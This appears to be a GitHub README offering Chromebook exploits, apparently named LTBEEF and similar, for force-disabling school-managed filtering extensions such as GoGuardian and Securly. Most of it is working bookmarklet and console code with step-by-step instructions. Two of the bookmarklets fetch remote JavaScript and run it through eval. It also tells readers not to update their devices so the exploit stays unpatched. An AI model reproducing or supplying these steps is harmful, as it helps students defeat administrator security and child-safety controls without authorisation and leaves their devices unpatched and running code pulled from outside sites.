Hello, I am Echo and I created this repo in order to give exploits for the masses and to prove one thing, chromebooks are literal trash, and a poor excuse for a computer. They are full of exploits, you might think you blocked/patched them all but then 3 more pop up. It is a endless game of wack-a-mole. Treat your students to a windows computer, they will thank you. And don't you dare start to think "My school district does not have that kind of money", it most likely does! How much are you paying the blocker companies? Think about that.
credit LittleMissNyan for the swag logo
This bookmarklet exploit that can force-disable any extension installed on Google Chrome. Also known as LTBEEF.
DO NOT UPDATE YOUR CHROMEBOOK! This exploit gets patched relatively quickly, so do not update! Need help to stop updates? Click here to learn how!
If you need any help, please go here: https://github.com/3kh0/ext-remover/discussions
- Bookmark this code
let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 250);- Make a bookmarklet with this code
javascript:localStorage.cluster="UNKNOWN_SCHOOL,"+(confirm("ok = Disable\ncancel = Enable ")?99999999999999:0),opener.chrome.extension.getBackgroundPage().location.reload() - Go to tinyurl.com/goofcurly if you have securly, tinyurl.com/goofguardian if you have goguardian, tinurl.com/goofsi for blocksi, tinyurl.com/goofclassroom for securly classroom, and tinyurl.com/goofumbrella.
- Once your on the link depending on your blocker, click the button you see, it should open a about:blank tab, then click the bookmarklet and press ok, and all sites should be unblocked. Credit to the SprinksMC#8421 on the Titanium Network Discord.
Using the found by bypassi you can disable extensions.
You will need to run bookmarklets and a extension installed from the chrome web store
Steps:
- Go to chrome://extensions
- Click any extension that's installed from the webstore, not one of the enterprise installed extensions
- Scroll down and click "Open in Chrome Web Store"
- Spam escape before the page loads. it should be a white screen, if it loads into the chrome webstore you have to try again.
- Run this bookmarklet:
let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 250);- Insert extension ID into the box
Note, if you close the tab the extensions will come back.
Uses Bypassi's pointblank exploit, Sharp_Jack#4374 made the initial payload, posted to TN kajigs by CoolElectronics#4683
The screenshot below was preformed on 108.0.5359.75 (Official Build) (64-bit) on the stable channel.
This has been tested and does work but has varying levels of success, you will need access to inspect element, more specifically, console.
- Open this URL on your chromebook:
chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.jsonShortened link: https://tinyurl.com/i-ltbeef - Open inspect and navigate to the console tab.
- Run the basic LTBEEF code such as
chrome.management.setEnabled('extensionid', false)Replacing extensionid with the ID of the extension you want to disable, e.g. the stuff after the = in the URL bar when you click the extension's "details" button in chrome://extensions
Credit to SprinkzMC#8421 (aka Bypassi) for finding this!
To re-enable just go to the chrome web listing for the extension and click on the banner.
Here are the instructions to using this exploit! There are two ways, using the GUI and using the ids, the GUI method is better.
Credit to Nebelung for this, link to the github
For easy setup go the the website at https://fognetwork.github.io/Ingot
- Show your bookmarks bar with
ctrl + shift + b - Right click on the bar and choose
Add Page - Set the name to
Ingotand the URL to the code below or here
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())If this helped please give me a star!
Credit to CompactCow#4717 for the amazing UI!
- Right click on the bar and choose
Add Page - Set the name to
GUIand the URL to the code below or here
javascript:fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});- Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- Click the bookmark (Make sure you are on the page above!)
- Use the menu to toggle your extensions!
If this helped please give me a star!
- Visit chrome://extensions and on the extension you want to disable click on Details
- Copy the text in the URL after the
?id=
For example if you have this URL:
chrome://extensions/?id=echoontopyou would only copyechoontop
- Go to the file
bookmark.jsand copy everything and create a new bookmark and use the code you copied as the Page URL - Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- Click the bookmark (Make sure you are on the page above!)
- Put the ID you copied into the text box.
You're done! The extension should now be disabled.
If this helped please give me a star!
- Visit chrome://extensions and on the extension you want to enable click on Details
- Click View in Chrome Web Store
- You will see a banner at the top of the page that says This item has been disabled in Chrome. Enable this item
- Click on Enable this item
You're done! The extension should now be enabled.
If this helped please give me a star!
Credit bypassi for finding and making this exploit!
Well, it's pretty basic. It finds extensions and displays them on this page with some toggle switches.
then, it detects when the toggle switch is toggled, and for what extension, then compiles a message to chrome that says "hey, turn this off for me". Chrome, mistaking this for the webstore complies.
There are still so many more fun exploits, please join the TN or my discord